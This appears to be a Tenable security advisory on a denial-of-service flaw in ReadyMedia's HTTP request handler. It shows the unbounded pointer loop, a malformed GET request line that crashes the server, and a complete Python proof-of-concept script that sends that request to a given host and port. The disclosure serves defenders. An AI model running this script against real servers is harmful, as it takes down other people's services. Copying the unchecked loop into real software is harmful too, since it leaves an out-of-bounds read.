[R1] ReadyMedia HTTP Request Denial of Service

According to the project's website, "ReadyMedia (formerly known as MiniDLNA) is a simple media server software, with the aim of being fully compliant with DLNA/UPnP-AV clients. It is developed by a NETGEAR employee for the ReadyNAS product line."

Late last year, while researching UPnP implementations, Tenable noticed an odd bit of code at the top of ReadyMedia's HTTP request handler. The code, cleaned up, looked like this:

if (strncmp(p, "http://", 7) == 0)
{
    p = p+7;
    while (*p!='/')
    {
        p++;
    }
}

Where the variable p is a pointer into the first line of the HTTP GET request. Presumably the point of this snippet of code was to treat:

GET http://lobster.info/albino HTTP/1.1\r\n

As if it were:

GET /albino HTTP/1.1\r\n

However, it should be obvious that if the character "/" is never found then ReadyMedia will keep reading and incrementing p until it crashes. For example, the following line in an otherwise well formed HTTP GET request would induce the crash:

GET http://albino.lobster.lol HTTP1.1\r\n

The following python script reproduces the crash when used against a vulnerable version of ReadyMedia.

import socket
import sys

if len(sys.argv) != 3:
    print 'Usage: ./crash_minidlna.py  '
    sys.exit(0)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))

print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)

print '[+] Sending payload...'
sub = ('GET http://albino.lobster.lol HTTP1.1\r\n' +
    'NT: upnp:event\r\n' +
    'Timeout: Second-20\n' +
    'Connection: close\r\n' +
    '\r\n')
sock.sendall(sub)

print '[+] Receiving response...'
sock.settimeout(5)
data = ''
try:
    data = sock.recv(2048)
except socket.error:
    pass

if len(data) == 0:
    print '[-] No response'
else:
    print '%s' % data

sock.close()
print '[+] Done!'